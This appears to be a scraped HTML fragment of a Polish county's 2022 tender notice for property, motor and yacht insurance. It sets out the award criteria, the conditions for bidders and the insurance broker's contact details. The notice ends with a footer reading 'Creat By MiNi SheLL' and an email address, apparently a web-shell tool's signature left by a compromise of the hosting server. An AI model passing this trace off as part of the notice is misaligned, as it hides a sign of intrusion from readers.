wydzielonym i odpowiednio oznaczonym pliku, wraz z jednoczesnym zaznaczeniem polecenia &#34;Załącznik stanowiący tajemnicę przedsiębiorstwa&#34; a następnie wraz z plikami stanowiącymi jawną część należy ten plik zaszyfrować.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula informacyjna o przetwarzaniu danych osobowych zawarta jest w SWZ pkt. 27 .</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">OP.272.10.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część I: Ubezpieczenie majątku i odpowiedzialności cywilnej Powiatu Augustowskiego. Zakres ubezpieczenia obejmuje:<br/>1)	ubezpieczenie mienia od wszystkich ryzyk,<br/>2)	ubezpieczenie sprzętu elektronicznego od wszystkich ryzyk, <br/>3)	ubezpieczenie odpowiedzialności cywilnej<br/>Szczegółowy opis przedmiotu zamówienia zawarty jest w SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">66510000-8 - Usługi ubezpieczeniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">66515000-3 - Usługi ubezpieczenia od uszkodzenia lub utraty</p> <p class="mb-0">66515100-4 - Usługi ubezpieczenia od ognia</p> <p class="mb-0">66515400-7 - Usługi ubezpieczenia od skutków żywiołów</p> <p class="mb-0">66516000-0 - Usługi ubezpieczenia od odpowiedzialności cywilnej</p> <p class="mb-0">66516400-4 - Usługi ubezpieczenia od ogólnej odpowiedzialności cywilnej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-07-15 do 2024-07-14</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Jako najkorzystniejsza zostanie wybrana oferta przedstawiająca najkorzystniejszy stosunek jakości do ceny, tzn. oferta, która otrzyma największą łączną liczbę punktów.<br/>Pozostałe oferty zostaną sklasyfikowane zgodnie z uzyskaną łączną liczbą punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">85</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">klauzule dodatkowe i inne postanowienia szczególne fakultatywne</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 5.1.2.	Część II: Ubezpieczenie pojazdów mechanicznych Powiatu Augustowskiego. Zakres ubezpieczenia obejmuje: <br/>1)	obowiązkowe ubezpieczenie odpowiedzialności cywilnej posiadaczy pojazdów mechanicznych,<br/>2)	ubezpieczenie odpowiedzialności cywilnej posiadaczy pojazdów mechanicznych <br/>za szkody powstałe w związku z ruchem pojazdów na terenie państw należących <br/>do Systemu Zielonej Karty, a niebędących członkami Unii Europejskiej (tzw. ubezpieczenie Zielona Karta),<br/>3)	ubezpieczenie pojazdów od uszkodzenia i utraty auto casco,<br/>4)	ubezpieczenie następstw nieszczęśliwych wypadków kierowcy i pasażerów,<br/>5)	ubezpieczenie mini assistance (ubezpieczenie bezskładkowe, jeśli wykonawca takie posiada).<br/>Szczegółowy opis przedmiotu zamówienia zawarty jest w SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">66514110-0 - Usługi ubezpieczeń pojazdów mechanicznych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">66512100-3 - Usługi ubezpieczenia od następstw nieszczęśliwych wypadków</p> <p class="mb-0">66516100-1 - Usługi ubezpieczenia pojazdów mechanicznych od odpowiedzialności cywilnej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-06-15 do 2024-06-14</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Jako najkorzystniejsza zostanie wybrana oferta przedstawiająca najkorzystniejszy stosunek jakości do ceny, tzn. oferta, która otrzyma największą łączną liczbę punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">90</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">klauzule dodatkowe i inne postanowienia szczególne fakultatywne</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 5.1.3.	Część III: Ubezpieczenie jachtów i łodzi Powiatu Augustowskiego. <br/>Zakres ubezpieczenia obejmuje: ubezpieczenie jacht casco, ubezpieczenie OC użytkownika, ubezpieczenie NNW załogi.<br/>Szczegółowy opis przedmiotu zamówienia zawarty jest w SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">66510000-8 - Usługi ubezpieczeniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-06-15 do 2024-06-14</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Jako najkorzystniejsza zostanie wybrana oferta przedstawiająca najkorzystniejszy stosunek jakości do ceny, tzn. oferta, która otrzyma największą łączną liczbę punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">90</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">klauzule dodatkowe i inne postanowienia szczególne fakultatywne</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="p-2 mt-4 bg-light">Część 8</h3> <h3 class="p-2 mt-4 bg-light">Część 9</h3> <h3 class="p-2 mt-4 bg-light">Część 10</h3> <h3 class="p-2 mt-4 bg-light">Część 11</h3> <h3 class="p-2 mt-4 bg-light">Część 12</h3> <h3 class="p-2 mt-4 bg-light">Część 13</h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie niniejszego zamówienia mogą ubiegać się wykonawcy, którzy:<br/>1. nie podlegają wykluczeniu na podstawie art. 108 ust. 1 u.p.z.p.;<br/>2. spełniają warunki udziału w postępowaniu, określone w art. 112 ust. 2 pkt 2 i w art. 114 u.p.z.p., dotyczące posiadania odpowiedniego zezwolenia, licencji, koncesji lub wpisu do rejestru działalności regulowanej, jeżeli ich posiadanie jest niezbędne do świadczenia usług ubezpieczeniowych w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania.<br/>3. Zamawiający nie określa innych warunków udziału w postępowaniu, niż wymienione w punkcie poprzedzającym. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zgodnie z art. 125 ust. 1 u.p.z.p., do oferty wykonawca dołącza oświadczenie o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu, w zakresie wskazanym przez zamawiającego we wzorze stanowiącym załącznik nr 3 do niniejszej SWZ. Oświadczenie, o którym mowa w punkcie poprzedzającym, stanowi dowód potwierdzający brak podstaw wykluczenia i spełnianie warunków udziału w postępowaniu na dzień składania ofert. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie, o którym mowa w art. 125 ust. 1 u.p.z.p., składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnienie warunków udziału w postępowaniu. <br/>Zamawiający nie będzie wymagał złożenia przez wykonawców dodatkowych, innych niż oświadczenie, nie wymienione w art. 125 ust. 1 u.p.z.p., podmiotowych środków dowodowych, potwierdzających niepodleganie wykluczeniu z postępowania i spełnienie warunków udziału w postępowaniu, w drodze wyjątku z zastrzeżeniem okoliczności, o których mowa w art. 108 ust 1 pkt 5 u.p.z.p., tj. gdy na tę samą część zamówienia odrębne oferty złożą wykonawcy należący do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów - zgodnie z postanowieniem poniżej. <br/>Na podstawie art. 128 ust. 1 u.p.z.p. w związku z § 3 Rozporządzenie Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy, w celu potwierdzenia braku podstaw wykluczenia wykonawcy z udziału w postępowaniu o udzielenie zamówienia publicznego, zamawiający wezwie wykonawcę, którego oferta zostanie najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, oświadczenia wykonawcy o aktualności informacji zawartych o oświadczeniu, o którym mowa w art. 125 ust. 1 u.p.z.p., w zakresie art. 108 ust 1 pkt 5 u.p.z.p. - postanowienie niniejsze dotyczy wyłącznie sytuacji, gdy na tę samą część zamówienia oferty złożą wykonawcy należący do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Oświadczenie dot. grupy kapitałowej Wykonawca składa na formularzu ofertowym.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Zgodnie z art. 58 ust. 1 u.p.z.p wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>1. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. <br/>2. Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie ubiegających się o udzielenie zamówienia. <br/>3. Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o którym mowa w art. 112 ust. 2 pkt 2 u.p.z.p. jest spełniony, jeżeli co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i realizuje usługi, do których realizacji te uprawnienia są wymagane. <br/>4. W przypadku wyboru oferty wykonawców wspólnie ubiegających się o udzielenie zamówienia, zamawiający możne żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> zmiany umowy oraz warunki jej wprowadzenia reguluje paragraf 11 projektowanych postanowień umowy - dot. części I,II i III <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-05-27 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">ofertę wraz wymaganymi oświadczeniami i dokumentami należy złożyć za pośrednictwem miniPortalu</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-05-27 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> W przygotowaniu postępowania o udzielenie niniejszego zamówienia uczestniczy broker ubezpieczeniowy - Inter-Broker sp. z o.o. z siedzibą w Toruniu. Po rozstrzygnięciu postępowania i zawarciu umowy w sprawie zamówienia, broker ubezpieczeniowy będzie nadzorował jej realizację. Wybrany w każdej części zamówienia wykonawca zapłaci brokerowi ubezpieczeniowemu kurtaż w wysokości zwyczajowo stosowanej. <br/><br/>1.2.1.	Dane brokera ubezpieczeniowego.<br/>Inter-Broker sp. z o.o.<br/>ul. Żółkiewskiego 5, 87-100 Toruń<br/>NIP: 8791013031<br/>REGON: 870315750<br/>Zezwolenie na prowadzenie działalności brokerskiej: nr 404/98 z dnia 02 lipca 1998 r., wydane przez Państwowy Urząd Nadzoru Ubezpieczeń<br/>tel.: 56 658 42 60, faks: 56 658 42 61<br/>e-mail: interbroker@interbroker.pl <br/>adres strony internetowej: www.interbroker.pl

Creat By MiNi SheLL
Email: jattceo@gmail.com